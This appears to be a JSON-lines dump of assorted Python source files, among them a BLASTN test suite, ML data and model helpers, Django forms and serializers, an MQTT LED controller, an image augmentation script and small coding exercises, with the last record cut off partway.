+{"seq_id":"621539814","text":"import pytest\nfrom unittest import mock\nfrom lca._prog import _blastn as blastn\n\n@mock.patch(\"lca._prog._blastn.shutil\")\n@mock.patch(\"lca._prog._blastn.subprocess\")\ndef test_run_blastn_raises_exception_when_blastn_called_with_help(mock_shutil,\n mock_subprocess):\n mock_shutil.which.return_value = \"not None\"\n with pytest.raises(blastn.BLASTNError):\n blastn._blastn_cmd([\"-help\"])\n\n@mock.patch(\"lca._prog._blastn.shutil\")\n@mock.patch(\"lca._prog._blastn.subprocess\")\ndef test_run_blastn_raises_exception_when_blastn_called_with_h(mock_shutil,\n mock_subprocess):\n mock_shutil.which.return_value = \"not None\"\n with pytest.raises(blastn.BLASTNError):\n blastn._blastn_cmd([\"-h\"])\n\n@mock.patch(\"lca._prog._blastn.shutil\")\ndef test_check_for_blastn_binary_looks_for_correct_name(mock_shutil):\n blastn._check_for_blastn_binary()\n mock_shutil.which.assert_called_with(\"blastn\")\n\n@mock.patch(\"lca._prog._blastn.shutil\")\ndef test_check_for_blastn_binary_raises_exception_if_blastn_binary_not_found(mock_shutil):\n mock_shutil.which.return_value = None\n with pytest.raises(blastn.BLASTNError):\n blastn._check_for_blastn_binary()\n\n@mock.patch(\"lca._prog._blastn.subprocess\")\ndef test_blastn_cmd_raises_exception_when_subprocess_retcode_is_1(mock_subprocess):\n mock_subprocess.run.return_value.returncode = 1\n with pytest.raises(blastn.BLASTNError):\n blastn._blastn_cmd([\"this is a test\"])\n\n@pytest.mark.parametrize(\"test_input\", [1, 1.1, b\"this is bytes\"])\ndef test_parse_stdout_raises_exception_when_input_not_string(test_input):\n with pytest.raises(TypeError):\n blastn._parse_stdout(test_input)\n\ndef test_get_header_raises_exception_with_unrecognized_column():\n with pytest.raises(blastn.BLASTNError):\n blastn._get_header(\"6 this_is_an_illegal_column_name\")\n\ndef test_check_outfmt_raises_exception_with_illegal_outfmt():\n with pytest.raises(blastn.BLASTNError):\n blastn._check_outfmt(\"101\")\n","sub_path":"test/test_blastn.py","file_name":"test_blastn.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"224986303","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import *\n\n\ndef load_pretrained_model(model, hidden1=256, hidden2=256):\n \n pretrained_model = tf.keras.models.load_model(model)\n pretrained_model.trainable = True \n\n h1 = tf.keras.layers.Dense(hidden1, activation='elu', name='dense_ft_1')(pretrained_model.layers[-2].output)\n h1 = tf.keras.layers.Dropout(0.50)(h1)\n h2 = tf.keras.layers.Dense(hidden2, activation='elu', name='dense_ft_2')(h1)\n h2 = tf.keras.layers.Dropout(0.50)(h2)\n output = tf.keras.layers.Dense(1, activation='sigmoid', name='output')(h2)\n \n # define new model\n new_model = tf.keras.models.Model(inputs=pretrained_model.inputs, outputs=output)\n\n # Learning rate of 5e-5 used for finetuning based on hyperparameter evaluations\n ft_optimizer = tf.keras.optimizers.Adam(learning_rate=0.00005) \n \n # Compile model with Cross Entropy loss\n new_model.compile(loss=tf.keras.losses.BinaryCrossentropy(),\n optimizer=ft_optimizer,\n metrics=params.METRICS)\n\n return new_model\n\n\n\n\n","sub_path":"src/models/model_helper.py","file_name":"model_helper.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"233095811","text":"from PIL import Image\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport math\n\nimport torch\nfrom torchvision import transforms\n\nclass DataTransform():\n def __init__(self, resize, mean, std):\n self.img_transform = transforms.Compose([\n transforms.Resize(resize),\n transforms.CenterCrop(resize),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n\n def __call__(self, img_path_list, acc_numpy, phase):\n img_tensor_list = self.transformImages(img_path_list)\n acc_numpy = acc_numpy.astype(np.float32)\n acc_numpy = acc_numpy / np.linalg.norm(acc_numpy)\n acc_tensor = torch.from_numpy(acc_numpy)\n return img_tensor_list, acc_tensor\n\n def transformImages(self, img_path_list):\n img_tensor_list = []\n for i in range(len(img_path_list)):\n img_tensor = self.img_transform(Image.open(img_path_list[i]))\n img_tensor_list.append(img_tensor)\n return img_tensor_list\n\n##### test #####\n# ## trans param\n# resize = 224\n# mean = ([0.5, 0.5, 0.5])\n# std = ([0.5, 0.5, 0.5])\n# ## image\n# img_path_list = [\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_0.jpg\",\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_72.jpg\",\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_144.jpg\",\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_216.jpg\",\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_288.jpg\"\n# ]\n# ## label\n# acc_list = [0, 0, 1]\n# acc_numpy = np.array(acc_list)\n# ## transform\n# data_transform = DataTransform(resize, mean, std)\n# img_trans_list, acc_trans = data_transform(img_path_list, acc_numpy)\n# print(\"acc_trans = \", acc_trans)\n# ## tensor -> numpy\n# img_trans_numpy_list = [np.clip(img_trans.numpy().transpose((1, 2, 0)), 0, 1) for img_trans in img_trans_list] #(rgb, h, w) -> (h, w, rgb)\n# print(\"np.array(img_trans_numpy_list).shape = \", np.array(img_trans_numpy_list).shape)\n# ## imshow\n# for i in range(len(img_path_list)):\n# plt.subplot2grid((2, len(img_path_list)), (0, i))\n# plt.imshow(Image.open(img_path_list[i]))\n# plt.subplot2grid((2, len(img_path_list)), (1, i))\n# plt.imshow(img_trans_numpy_list[i])\n# plt.show()\n","sub_path":"pysrc/common_multi/data_transform_model.py","file_name":"data_transform_model.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"106065802","text":"#!/usr/bin/python\n\nimport os\npetsc_hash_pkgs=os.path.join(os.getenv('HOME'),'petsc-hash-pkgs')\n\nif __name__ == '__main__':\n import sys\n import os\n sys.path.insert(0, os.path.abspath('config'))\n import configure\n configure_options = [\n '--package-prefix-hash='+petsc_hash_pkgs,\n '--with-mpi=0',\n '--with-cc=gcc',\n '--with-cxx=g++',\n '--with-fc=gfortran',\n '--with-cuda=1',\n '--download-hdf5',\n '--download-metis',\n '--download-superlu',\n '--download-mumps',\n '--with-mumps-serial',\n '--with-shared-libraries=1',\n ]\n configure.petsc_configure(configure_options)\n\n","sub_path":"config/examples/arch-ci-linux-cuda-uni-pkgs.py","file_name":"arch-ci-linux-cuda-uni-pkgs.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"146212514","text":"from django import forms\nfrom django.forms import ModelForm\nfrom surveys.models import Question,Survey,Response,AnswerText,AnswerRadio,AnswerSelect,AnswerInteger,AnswerSelectMultiple,QuestionSet,Page\n\nclass ResponseForm(ModelForm):\n class Meta:\n model = Response\n #fields = ('interviewer', 'interviewee', 'conditions', 'comments')\n fields = ()\n def __init__(self, *args, **kwargs):\n page = kwargs.pop('page')\n survey = kwargs.pop('survey')\n user = kwargs.pop('user')\n self.page = page\n self.survey = survey\n self.user = user\n super(ResponseForm, self).__init__(*args, **kwargs)\n self.prefix = \"question\"\n\n data = kwargs.get('data')\n for q in page.questions.question_set.all():\n question = \"%s_%d\" % (self.prefix, q.pk)\n\n if q.question_type == Question.TEXT:\n form = forms.CharField(label=q.text, widget=forms.TextInput)\n elif q.question_type == Question.RADIO:\n question_choices = q.get_choices()\n form = forms.ChoiceField(label=q.text, widget=forms.RadioSelect, choices=question_choices)\n elif q.question_type == Question.SELECT:\n question_choices = q.get_choices()\n question_choices = tuple([('', '---------------')]) + question_choices\n form = forms.ChoiceField(label=q.text, widget=forms.Select, choices=question_choices)\n elif q.question_type == Question.SELECT_MULTIPLE:\n question_choices = q.get_choices()\n form = forms.MultipleChoiceField(label=q.text, widget=forms.CheckboxSelectMultiple, choices=question_choices)\n elif q.question_type == Question.INTEGER:\n form = forms.IntegerField(label=q.text)\n\n self.fields[question] = form\n\n if q.required:\n self.fields[question].required = True\n self.fields[question].widget.attrs[\"class\"] = \"required\"\n else:\n self.fields[question].required = False\n \n if data:\n self.fields[question].initial = data.get(question)\n def save(self,commit=True):\n response = super(ResponseForm, self).save(commit=False)\n response.page = self.page\n response.user = self.user\n response.save()\n\n for field_name,field_value in self.cleaned_data.items():\n if field_name.startswith(self.prefix):\n q_id = int(field_name.split(\"_\")[1])\n q = Question.objects.get(pk=q_id)\n if q.question_type == Question.TEXT:\n a = AnswerText(question = q)\n elif q.question_type == Question.RADIO:\n a = AnswerRadio(question = q)\n elif q.question_type == Question.SELECT:\n a = AnswerSelect(question = q)\n elif q.question_type == Question.SELECT_MULTIPLE:\n a = AnswerSelectMultiple(question = q)\n elif q.question_type == Question.INTEGER:\n a = AnswerInteger(question = q)\n a.body = field_value\n\n a.response = response\n a.save()\n return response\n\n","sub_path":"surveys/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"631024967","text":"import paho.mqtt.client as mqtt\nimport RPi.GPIO as GPIO\n\nMQTT_HOST = \"test.mosquitto.org\"\nMQTT_PORT = 1883\nMQTT_KEEPALIVE_INTERVAL = 60\nMQTT_TOPIC = \"gapple\"\n\nled_pin = 18 \n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(led_pin, GPIO.OUT)\n\ndef on_message(client, userdata, message):\n result = str(message.payload.decode(\"utf-8\"))\n print(\"received message = \", str(message.payload.decode(\"utf-8\")))\n \n if(result.upper() == \"ON\"):\n GPIO.output(led_pin,True)\n elif(result.upper() == \"OFF\"):\n GPIO.output(led_pin,False)\n else:\n print(\"Illegal Arugment Exception!\");\n \n\n# Initiate MQTT Client\nclient = mqtt.Client()\n\n# Register received message callback function\nclient.on_message = on_message\n\n# Connect with MQTT Broker\n# client.username_pw_set(\"\", \"\")\nclient.connect(MQTT_HOST, MQTT_PORT, MQTT_KEEPALIVE_INTERVAL)\n\nclient.subscribe(MQTT_TOPIC)\n\n# Loop from MQTT_Broker\nclient.loop_forever()\n","sub_path":"exercise/mqtt/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"48807112","text":"from rest_framework import serializers, fields\nfrom events import models\nfrom users import (\n serializers as user_serializers,\n models as user_models\n)\n\n\nclass CampusSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.Campus\n fields = ('id', 'name', 'description')\n read_only_fields = ('id', 'name', 'description')\n\n\nclass EventLocationSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventLocation\n fields = ('id', 'name', 'description', 'is_public', 'created_at', 'campus')\n read_only_fields = ('id', 'created_at', 'modified_at', 'is_public')\n\n def to_representation(self, instance):\n data = super(EventLocationSerializer, self).to_representation(instance)\n if instance.campus:\n data['campus'] = CampusSerializer(instance=instance.campus).data\n return data\n\n def save(self, **kwargs):\n self._validated_data.update({\n 'user_id': kwargs.pop('user_id')\n })\n return super(EventLocationSerializer, self).save(**kwargs)\n\n\nclass EventShoppingItemSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventShoppingItem\n fields = ('id', 'name', 'created_at', 'event', 'user_id', 'amount')\n read_only_fields = ('id', 'created_at', 'modified_at')\n\n def to_representation(self, instance):\n data = super(EventShoppingItemSerializer, self).to_representation(instance)\n data['creator'] = instance.user_id if instance.user_id else None\n data['bringer'] = instance.bringer_id if instance.bringer_id else None\n data.pop('user_id')\n return data\n\n\nclass EventShoppingItemBringSerializer(serializers.Serializer):\n bring = fields.BooleanField(required=True)\n\n def save(self, **kwargs):\n item_obj = kwargs.pop('item_obj')\n user_id = kwargs.pop('user_id')\n if self.validated_data.get('bring'):\n # add bringer_id to shopping item object\n item_obj.bringer_id = user_id\n else:\n # remove bringer_id to shopping item object\n item_obj.bringer_id = \"\"\n item_obj.save()\n return item_obj\n\n\nclass EventMealSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventMeal\n fields = ('id', 'name', 'created_at', 'event', 'meal_id', 'user_id')\n read_only_fields = ('id', 'created_at', 'modified_at')\n\n def to_representation(self, instance):\n data = super(EventMealSerializer, self).to_representation(instance)\n data['creator'] = instance.user_id\n data['voters'] = instance.votes.values_list('user_id', flat=True)\n data['votes'] = len(data['voters'])\n data.pop('user_id')\n return data\n\n\nclass EventMealVoteSerializer(serializers.Serializer):\n vote = fields.BooleanField(required=True)\n\n def save(self, **kwargs):\n meal_obj = kwargs.pop('meal_obj')\n user_id = kwargs.pop('user_id')\n if self.validated_data.get('vote'):\n # Create Vote\n meal_obj.votes.create(user_id=user_id)\n else:\n # Delete Vote\n meal_obj.votes.filter(user_id=user_id).delete()\n return meal_obj\n\n\nclass EventMessageSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventMessage\n fields = ('id', 'text', 'user_id', 'event', 'created_at')\n read_only_fields = ('id', 'created_at', 'modified_at')\n\n def to_representation(self, instance):\n data = super(EventMessageSerializer, self).to_representation(instance)\n data['creator'] = instance.user_id\n data.pop('user_id')\n return data\n\n\nclass EventPreferenceSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.EventPreference\n fields = ('event', 'food_preference')\n\n def to_representation(self, instance):\n return user_serializers.FoodPreferenceSerializer(instance=instance.food_preference).data\n\n\nclass EventUserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventUser\n fields = ('event', 'user_id')\n\n def to_representation(self, instance):\n \"\"\"\n :param instance: EventUser instance\n :return: UserSerializer data\n \"\"\"\n return user_serializers.UserSerializer(instance=instance.user_id).data\n\n\nclass EventSerializer(serializers.ModelSerializer):\n preferenceids = fields.MultipleChoiceField(\n choices=user_models.FoodPreference.objects.all().values_list('pk', flat=True),\n allow_null=True,\n required=False,\n help_text=\"Food Preference IDs to save with event while creation\"\n )\n\n class Meta:\n model = models.Event\n fields = ('id', 'title', 'description', 'start_at', 'end_at', 'created_at', 'capacity', 'user_id', 'location',\n 'preferenceids')\n read_only_fields = ('id', 'created_at', 'user_id')\n\n def to_representation(self, instance):\n data = super(EventSerializer, self).to_representation(instance)\n data['creator'] = instance.user_id\n data.pop('user_id')\n if self.context.get('is_list', False):\n data['num_members'] = instance.users.count()\n data['members'] = []\n data['shoppingitems'] = []\n data['meals'] = []\n data['messages'] = []\n else:\n data['members'] = instance.users.all().values_list('user_id', flat=True)\n data['num_members'] = len(data['members'])\n data['shoppingitems'] = EventShoppingItemSerializer(instance=instance.shop_items.all(), many=True).data\n data['meals'] = EventMealSerializer(instance=instance.meals.all(), many=True).data\n data['messages'] = EventMessageSerializer(instance=instance.messages.all(), many=True).data\n\n data['preferences'] = EventPreferenceSerializer(\n instance=instance.preferences.all(),\n many=True\n ).data\n data['location'] = EventLocationSerializer(instance=instance.location).data\n return data\n\n def save(self, **kwargs):\n \"\"\"\n Create/Update Event Object.\n Then check is there are preferenceids.\n If yes, Delete old preferences. Create EventPreference objects\n \"\"\"\n self._validated_data.update({\n 'user_id': kwargs.pop('user_id')\n })\n preferenceids = self._validated_data.pop('preferenceids', [])\n event_obj = super(EventSerializer, self).save(**kwargs)\n if preferenceids:\n # Delete Old Preference objects\n models.EventPreference.objects.filter(event=event_obj).delete()\n # Create Event Preference objects\n data = [\n {\n \"event\": event_obj.id,\n \"food_preference\": pref_id\n } for pref_id in preferenceids\n ]\n pref_serializer = EventPreferenceSerializer(data=data, many=True)\n pref_serializer.is_valid(raise_exception=True)\n pref_serializer.save()\n\n return event_obj\n","sub_path":"events/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10957708","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 28 11:58:55 2019\n\n@author: Moha-Thinkpad\n\"\"\"\n\n## code for augmenting image + landmark locatios\n# based on skimage\n# and imgaug https://github.com/aleju/imgaug\n\n\nfrom skimage import io\nfrom numpy import genfromtxt\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport imgaug as ia\nfrom imgaug import augmenters as iaa\nimport glob\nimport os\nfrom scipy import misc\n\n# image source directory\nSourcePath='./Sources'\n# image destination directory\nwrite_to_dir = \"./augmented\"\n\ntry:\n os.mkdir(write_to_dir)\nexcept:\n print('destination folder is already exist')\n\n\n\n# set your augmentation sequqnces here\n# in a list called AugCongigList \n \n \nAugCongigList=[ \n iaa.Sequential([iaa.Fliplr(1, name=\"Flipper\")\n ], name='first config, just flip')\n , \n iaa.Sequential([iaa.Fliplr(1, name=\"Flipper\"),\n iaa.Affine(scale={\"x\": 0.8, \"y\": 0.9}, \n translate_percent={\"x\": 0.2, \"y\": 0.1}, \n rotate= 45, name='affine 1')] , name='second config, sequential, flip + affine')\n ] \n\n\n\nfor filename in glob.glob(SourcePath+'/*.png'): #assuming png\n \n FileName=filename.replace(SourcePath,'')\n FileName=FileName[:len(FileName)-4]\n \n \n Image = io.imread(filename)\n \n \n \n Landmarks = genfromtxt(SourcePath+FileName+'.csv', delimiter=',') \n Landmarks = Landmarks.astype(int)\n Landmarks=Landmarks[1:] # remove the first row because it is just axis label \n \n #### visualization\n# plt.figure()\n# plt.imshow(Image)\n# plt.plot(Landmarks[0,1],Landmarks[0,0],marker=\"s\",color='red')\n# plt.plot(Landmarks[1,1],Landmarks[1,0],marker=\"s\",color='red')\n# plt.plot(Landmarks[2,1],Landmarks[2,0],marker=\"s\",color='red')\n# plt.plot(Landmarks[3,1],Landmarks[3,0],marker=\"s\",color='red')\n# plt.plot(Landmarks[4,1],Landmarks[4,0],marker=\"s\",color='red')\n # The augmenters expect a list of imgaug.KeypointsOnImage.\n try:\n images=np.zeros(shape=[1,Image.shape[0],Image.shape[1],Image.shape[2]], dtype='uint8')\n images[0,:,:,:]=Image\n except:\n images=np.zeros(shape=[1,Image.shape[0],Image.shape[1]], dtype='uint8')\n images[0,:,:]=Image\n \n # Generate random keypoints.\n # The augmenters expect a list of imgaug.KeypointsOnImage.\n keypoints_on_images = []\n for image in images:\n keypoints = []\n for _ in range(len(Landmarks)):\n keypoints.append(ia.Keypoint(x=Landmarks[_,1], y=Landmarks[_,0]))\n keypoints_on_images.append(ia.KeypointsOnImage(keypoints, shape=image.shape))\n \n\n for ConfCounter in range(len(AugCongigList)):\n \n seq=AugCongigList[ConfCounter]\n \n seq_det = seq.to_deterministic() # call this for each batch again, NOT only once at the start\n \n # augment keypoints and images\n images_aug = seq_det.augment_images(images)\n transformed_keypoints = seq_det.augment_keypoints(keypoints_on_images)\n \n X_new=[]\n Y_new=[]\n # Example code to show each image and print the new keypoints coordinates\n for keypoints_after in transformed_keypoints:\n for kp_idx, keypoint in enumerate(keypoints_after.keypoints):\n x_new, y_new = keypoint.x, keypoint.y\n X_new.append(x_new)\n Y_new.append(y_new)\n \n newLandmarks=np.zeros(Landmarks.shape) \n newLandmarks[:,0]=np.asarray(Y_new)\n newLandmarks[:,1]=np.asarray(X_new)\n newLandmarks=newLandmarks.astype(int)\n\n# plt.figure()\n# plt.imshow(images_aug[0,:,:])\n# plt.plot(newLandmarks[0,1],newLandmarks[0,0],marker=\"s\",color='red')\n# plt.plot(newLandmarks[1,1],newLandmarks[1,0],marker=\"s\",color='red')\n# plt.plot(newLandmarks[2,1],newLandmarks[2,0],marker=\"s\",color='red')\n# plt.plot(newLandmarks[3,1],newLandmarks[3,0],marker=\"s\",color='red')\n# plt.plot(newLandmarks[4,1],newLandmarks[4,0],marker=\"s\",color='red')\n \n try:\n misc.imsave(write_to_dir+FileName+'_'+str(ConfCounter)+'_aug.png', images_aug[0,:,:,:])\n except:\n misc.imsave(write_to_dir+FileName+'_'+str(ConfCounter)+'_aug.png', images_aug[0,:,:])\n\n np.savetxt(write_to_dir+FileName+'_'+str(ConfCounter)+'_aug.csv', \n newLandmarks , delimiter=\",\", fmt='%i' , header='row,col')\n \n text_file = open(write_to_dir+FileName+'_'+str(ConfCounter)+'_info.txt', \"w\")\n text_file.write(\"Augmentation Info \" + '\\n' + 'name:' + seq.name + '\\n' +'\\%s' % seq)\n text_file.close()","sub_path":"PrMain_batch_images.py","file_name":"PrMain_batch_images.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"511626469","text":"from django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url,include\nfrom payroll import views\nurlpatterns = [\n #url(r'fileupload/', views.FileUploadView,name='FileUploadView1'),\n #url(r'authenticate1/', views.authenticateuser1, name='authenticateuser1'),\n url(r'authenticate/', views.authenticateuser, name='authenticateuser'),\n url(r'^$', views.index, name='index'),\n url(r'comparision/', views.Comparision.as_view()),\n url(r'legacyempdata/', views.LegacyEmpData,name='LegacyEmpData'),\n url(r'newempdata/', views.NewEmpData, name='NewEmpData'),\n url(r'legacyemppaydata/', views.LegacyEmpPayData, name='LegacyEmpPayData'),\n url(r'newemppaydata/', views.NewEmpPayData, name='NewEmpPayData'),\n url(r'empmappingdata/', views.EmpMappingData, name='EmpMappingData'),\n url(r'legacyempcomponentmapping/', views.LegacyPayComponentMapping, name='LegacyPayComponentMapping'),\n url(r'newempcomponentmapping/', views.NewPayComponentMapping, name='NewPayComponentMapping'),\n\n\n\n]","sub_path":"payroll/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"586960221","text":"# Higher Lower\n# Program should work but will need to be usability tested\nimport random\n\n# Number checking function:\ndef int_check(question, low=None, high=None):\n\n # error messages\n if low is not None and high is not None:\n error = \"Please enter an integer between {} and {} \" \\\n \"(inclusive)\".format(low, high)\n elif low is not None and high is None:\n error = \"Please enter an integer that is more than or \" \\\n \"equal to {}\".format(low)\n elif low is None and high is not None:\n error = \"Please enter an integer that is less than or \" \\\n \"equal to {}\".format(high)\n\n else:\n error = \"Please enter an integer\"\n\n while True:\n\n try:\n response = int(input(question))\n\n # Checks response is not low\n if low is not None and response < low:\n print(error)\n continue\n\n # Checks response is not too high\n if high is not None and response > high:\n print(error)\n continue\n\n return response\n\n except ValueError:\n print(error)\n continue\n\n# Main routine\n\nlowest = int_check(\"Low Number: \")\nhighest = int_check(\"High Number: \", lowest + 1)\nrounds = int_check(\"Rounds: \", 1)\n# guess = int_check(\"Guess: \", lowest, highest)\n\n# Generate secret number between low and high\nLOW = lowest\nHIGH = highest\n\nfor item in range(LOW, HIGH):\n secret = random.randint(LOW, HIGH)\n\n# Compare users guess with secret number\nSECRET = secret\nGUESSES_ALLOWED = 10\n\nalready_guessed = []\nguesses_left = GUESSES_ALLOWED\nnum_won = 0\n\nguess = \"\"\n\n# Start game\nwhile guess != SECRET and guesses_left >= 1:\n\n guess = int(input(\"Guess: \")) # replace this with function call later\n\n # checks that guess is not a duplicate\n if guess in already_guessed:\n print(\"You have already guessed that number. Please try again. \"\n \"You still have {} guesses left\".format(guesses_left))\n continue\n\n guesses_left -= 1\n already_guessed.append(guess)\n\n # if user has guesses left\n if guesses_left > 1:\n if guess > SECRET:\n print(\"Too high, try a lower number. Guesses left: {}\".format(guesses_left))\n\n elif guess < SECRET:\n print(\"Too low, try a higher number. Guesses left: {}\".format(guesses_left))\n\n # if user has one guess left\n elif guesses_left == 1:\n if guess > SECRET:\n print(\"Too high, try a lower number. THIS IS YOUR FINAL GUESS!\")\n\n elif guess < SECRET:\n print(\"Too high, try a lower number. THIS IS YOUR FINAL GUESS!\")\n\nif guess == SECRET:\n if guesses_left == GUESSES_ALLOWED - 1:\n print(\"Good job! You got the secret number in one guess :)\")\n else:\n print(\"Congratulations, you got it in {} guesses\".format(len(already_guessed)))\n num_won += 1\nelse:\n print(\"Sorry, you lost this round because you have run out of guesses :(\")","sub_path":"Higher_Lower_Game_v2.py","file_name":"Higher_Lower_Game_v2.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"12378921","text":"'''\nImplement strStr() .\n\nReturn the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n\nExample 1:\n\nInput: haystack = \"hello\", needle = \"ll\"\nOutput: 2\n\nExample 2:\n\nInput: haystack = \"aaaaa\", needle = \"bba\"\nOutput: -1\n\nClarification:\n\nWhat should we return when needle is an empty string? This is a great question to ask during an interview.\n\nFor the purpose of this problem, we will return 0 when needle is an empty string. This is consistent to C's strstr() and Java's indexOf() .\n'''\nimport time\nclass Solution():\n def __init__(self):\n self.haystack='afjlajldjncv,ndkhaljekjafnkeljelrjlndmn,mcnzkjhfaflkjajljiuieonaknjlkjhello'\n self.needle='ll'\n\n '''我的方法'''\n def myFun(self):\n lenHay=len(self.haystack)\n lenNee=len(self.needle)\n for i in range(lenHay-lenNee+1):\n flag=1\n for j in range(lenNee):\n if self.needle[j]!=self.haystack[i+j]:\n flag=-1\n break\n if flag==1:\n return i\n return -1\n\n '''答案方法1'''\n def strStr(self):\n lenHay = len(self.haystack)\n lenNee = len(self.needle)\n if lenHay==lenNee:\n if self.haystack==self.needle:\n return 0\n else:\n return -1\n for i in range(lenHay):\n k=i\n j=0\n while(j None:\n \"\"\"\n @param dot_file: The path to the DOT file\n @return A list of networkx MultiGraphs containing the graphs in the DOT file\n \"\"\"\n if exists(dot_file):\n self._parse_dot_file(dot_file)\n else:\n self._graph = []\n logger.error(f\"File {dot_file} not found\")\n \n def _parse_dot_file(self, path: str) -> None:\n logger.info(f\"Parsing dot file {path}\")\n graph = read_dot(path)\n\n if len(graph.nodes) > 0:\n self._graph = [self._filter_graph(graph)]\n return\n \n # handle subgraphs\n pydot_graph = graph_from_dot_file(path)\n self._graph = []\n for p in pydot_graph:\n for subgraph in p.get_subgraphs():\n graph = from_pydot(subgraph)\n self._graph.append(self._filter_graph_gcc(graph))\n \n def _filter_graph_gcc(self, graph: networkx.MultiGraph) -> networkx.MultiGraph:\n logger.debug(\"Filtering graph\")\n\n duplicate_nodes = [n for n in graph.nodes if n.endswith(':s') or n.endswith(':n')]\n for x in duplicate_nodes:\n in_edges = list(graph.in_edges(x))\n out_edges = list(graph.out_edges(x))\n actual_node = x.split(':')[0]\n for src, dst in in_edges:\n graph.add_edge(src, actual_node)\n graph.remove_edge(src, x)\n for src, dst in out_edges:\n graph.add_edge(actual_node, dst)\n graph.remove_edge(src, dst)\n graph.remove_node(x)\n\n flag = False\n for (u,v,_) in graph.edges:\n if 'label' in graph.nodes[u] and graph.nodes[u]['label'].strip(\"'\").strip('\"') == 'ENTRY':\n if 'label' in graph.nodes[v] and graph.nodes[v]['label'].strip(\"'\").strip('\"') == 'EXIT':\n flag = True\n break\n \n if flag is True:\n graph.remove_edge(u,v)\n \n return graph\n \n def _filter_graph(self, graph: networkx.MultiGraph) -> networkx.MultiGraph:\n \"\"\"\n Filter the graph by merging duplicate blocks with the original\n \"\"\"\n logger.debug(\"Filtering graph\")\n # Roots are identified by 0 incoming edges\n possible_roots = [n for n,d in graph.in_degree() if d == 0 ]\n possible_exits = [n for n,d in graph.out_degree() if d == 0 ]\n\n # Duplicate nodes also have 0 incoming edges\n # However, duplicate nodes do not have any instructions\n duplicate_nodes = [n for n in possible_roots if len(graph.nodes[n]) == 0 ]\n\n # Duplicates are identified by following the naming pattern {original}:s[0-9]\n duplicate_node_map = {}\n for tmp in set(possible_roots)-set(duplicate_nodes):\n duplicate_node_map[tmp] = [n for n in duplicate_nodes if n.startswith(tmp) and n[len(tmp)] == ':' ]\n \n # Merge duplicates with original\n for tmp in duplicate_node_map:\n for duplicate_node in duplicate_node_map[tmp]:\n out_edges = list(graph.out_edges(duplicate_node))\n for src, dst in out_edges:\n graph.add_edge(tmp, dst)\n graph.remove_edge(src, dst)\n graph.remove_node(duplicate_node)\n\n duplicate_nodes = [n for n in possible_exits if len(graph.nodes[n]) == 0 ]\n\n duplicate_node_map = {}\n for tmp in set(possible_exits)-set(duplicate_nodes):\n duplicate_node_map[tmp] = [n for n in duplicate_nodes if n.startswith(tmp) and n[len(tmp)] == ':' ]\n \n for tmp in duplicate_node_map:\n for duplicate_node in duplicate_node_map[tmp]:\n in_edges = list(graph.in_edges(duplicate_node))\n for src, dst in in_edges:\n graph.add_edge(src, tmp)\n graph.remove_edge(src, dst)\n graph.remove_node(duplicate_node)\n \n flag = False\n for (u,v,_) in graph.edges:\n if 'label' in graph.nodes[u] and graph.nodes[u]['label'].strip(\"'\").strip('\"') == 'ENTRY':\n if 'label' in graph.nodes[v] and graph.nodes[v]['label'].strip(\"'\").strip('\"') == 'EXIT':\n flag = True\n break\n \n if flag is True:\n graph.remove_edge(u,v)\n \n return graph\n \n @property\n def graph(self) -> List[networkx.MultiGraph]:\n return self._graph\n\n @staticmethod\n def get_roots(graph) -> List[str]:\n return [n for n,d in graph.in_degree() if d == 0 ]","sub_path":"bifrost/dot_parser.py","file_name":"dot_parser.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"313615531","text":"class Solution:\n def findContentChildren(self, g, s):\n g.sort()\n s.sort()\n res = 0\n i = 0\n j = 0\n while i < len(g) and j < len(s):\n if g[i] > s[j]:\n j += 1\n continue\n res += 1\n i += 1\n j += 1\n return res\n\nif __name__ == '__main__':\n sol = Solution()\n \n g = [1, 